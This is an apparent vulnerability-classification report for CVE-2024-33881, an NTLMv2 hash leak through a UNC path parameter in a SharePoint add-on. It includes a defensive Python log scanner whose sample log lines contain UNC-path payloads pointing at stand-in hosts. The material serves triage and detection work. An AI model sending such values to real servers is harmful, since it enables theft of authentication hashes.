CWE-200 Exposure of Sensitive Information to an Unauthorized Actor
Original Vulnerability Description
CVE-2024-33881: An issue was discovered in VirtoSoftware Virto Bulk File Download 5.5.44 for SharePoint 2019. The Virto.SharePoint.FileDownloader/Api/Download.ashx isCompleted method allows an NTLMv2 hash leak via a UNC share pathname in the path parameter.
Extracted Key Phrases
| Key | Value |
|---|---|
| [WEAKNESS] | NTLMv2 hash leak |
| [PRODUCT] | VirtoSoftware Virto Bulk File Download for SharePoint |
| | Not explicitly specified, but implied to be a malicious actor who can manipulate the path parameter |
| [IMPACT] | Potential exposure of NTLMv2 hash, which could lead to unauthorized access or further attacks |
| [VECTOR] | Manipulation of the path parameter in the Virto.SharePoint.FileDownloader/Api/Download.ashx isCompleted method |
| [ROOTCAUSE] | Improper handling of UNC share pathnames in the path parameter of the isCompleted method |
Chain
The vulnerability chain starts with the improper handling of UNC share pathnames in the isCompleted method of the Virto Bulk File Download component. This root cause allows an attacker to manipulate the path parameter, potentially leading to an NTLMv2 hash leak. The leak of NTLMv2 hashes could then be exploited for unauthorized access or further attacks on the SharePoint system.
Assigned CWEs
Due to limited information from the search tools, we can infer the following CWEs based on the vulnerability description:
| CWE ID | CWE Name | CWE Description | CWE Abstraction Level | CWE Vulnerability Mapping Label | CWE Vulnerability Mapping Notes |
|---|---|---|---|---|---|
| CWE-200 | Exposure of Sensitive Information to an Unauthorized Actor | The product exposes sensitive information to an actor that is not explicitly authorized to have access to that information. | Base | DISCOURAGED | The NTLMv2 hash leak exposes sensitive authentication information. |
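For defenders triaging the chain described above, the following added example (not part of the original report and not vendor code) scans IIS W3C log lines for requests to the named endpoint whose `path` parameter decodes to a remote share path. The log field layout, sample lines, hosts and addresses are constructed for illustration; only the endpoint name and the `path` parameter come from the CVE description.

```python
import re
from urllib.parse import parse_qsl, unquote

# Endpoint named in the CVE description; matched as a case-insensitive substring.
ENDPOINT = "virto.sharepoint.filedownloader/api/download.ashx"

# Path forms that make Windows connect to a remote host:
# \\host\share, //host/share, \\?\UNC\host\share, \\.\UNC\..., file://host/share
_REMOTE = re.compile(
    r"^(?:[\\/]{2}[?.][\\/]unc[\\/]"      # extended-length / device UNC prefix
    r"|[\\/]{2}(?![?.][\\/])[^\\/]+"      # plain UNC, not a local \\?\C:\ path
    r"|file:[\\/]{2}[^\\/])", re.I)       # file URL with a host component

def decode(value, rounds=3):
    """Undo up to `rounds` extra layers of percent-encoding."""
    for _ in range(rounds):
        nxt = unquote(value)
        if nxt == value:
            break
        value = nxt
    return value.strip()

def is_remote_path(value):
    return bool(_REMOTE.match(decode(value)))

def suspicious_requests(log_lines):
    """Return (timestamp, client IP, decoded path) for each flagged request."""
    names, hits = [], []
    for line in log_lines:
        if line.startswith("#Fields:"):   # column order comes from the log header
            names = line.split()[1:]
            continue
        if line.startswith("#") or not names:
            continue
        rec = dict(zip(names, line.split()))
        if ENDPOINT not in rec.get("cs-uri-stem", "").lower():
            continue
        for key, value in parse_qsl(rec.get("cs-uri-query", ""), keep_blank_values=True):
            if key.lower() == "path" and is_remote_path(value):
                hits.append((f"{rec.get('date')} {rec.get('time')}", rec.get("c-ip"), decode(value)))
    return hits

# Constructed sample log (assumed field layout, documentation-range addresses).
SAMPLE_LOG = [
    "#Fields: date time cs-method cs-uri-stem cs-uri-query c-ip sc-status",
    "2024-05-02 10:01:11 GET /Virto.SharePoint.FileDownloader/Api/Download.ashx path=C%3A%5CTemp%5Cjob1.zip 10.0.0.5 200",
    "2024-05-02 10:03:40 GET /Virto.SharePoint.FileDownloader/Api/Download.ashx path=%5C%5C192.0.2.10%5Cshare%5Cx 198.51.100.7 200",
    "2024-05-02 10:04:02 GET /virto.sharepoint.filedownloader/api/download.ashx Path=%255C%255Cfiles.example.net%255Cs 198.51.100.7 200",
    "2024-05-02 10:05:00 GET /Virto.SharePoint.FileDownloader/Api/Download.ashx path=%5C%5C%3F%5CC%3A%5CTemp%5Cjob2.zip 10.0.0.5 200",
    "2024-05-02 10:06:00 GET /sites/docs/page.aspx path=%5C%5Chost%5Cshare 10.0.0.9 200",
]
```

Hits are worth correlating with outbound SMB (TCP 445) connections from the SharePoint server to the host named in the decoded path.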
🐛 Summary
The assigned CWE-400: "Uncontrolled Resource Consumption" by CISA-ADP does not address the root cause weakness.
https://github.com/cisagov/vulnrichment/blob/07837010e13b885bbfdea2565052692312b96dc7/2024/33xxx/CVE-2024-33881.json#L92
CWE Assignment Report
More appropriate: